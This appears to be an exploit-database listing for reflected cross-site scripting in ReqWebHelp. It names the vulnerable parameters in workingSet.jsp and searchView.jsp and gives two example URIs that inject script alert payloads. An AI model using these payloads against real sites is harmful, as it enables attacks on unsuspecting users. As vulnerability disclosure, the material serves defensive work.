header-logo
Suggest Exploit
vendor:
ReqWebHelp
by:
John Doe
4.3
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: ReqWebHelp
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Cross-Site Scripting (XSS) in ReqWebHelp

Cross-Site Scripting (XSS) vulnerability in ReqWebHelp allows remote attackers to inject arbitrary web script or HTML via the operation parameter in workingSet.jsp, the searchWord parameter in searchView.jsp, the maxHits parameter in searchView.jsp, the scopedSearch parameter in searchView.jsp, and the scope parameter in searchView.jsp.

Mitigation:

Input validation should be used to prevent Cross-Site Scripting (XSS) attacks.
Source

Exploit-DB raw data:

Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=

http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>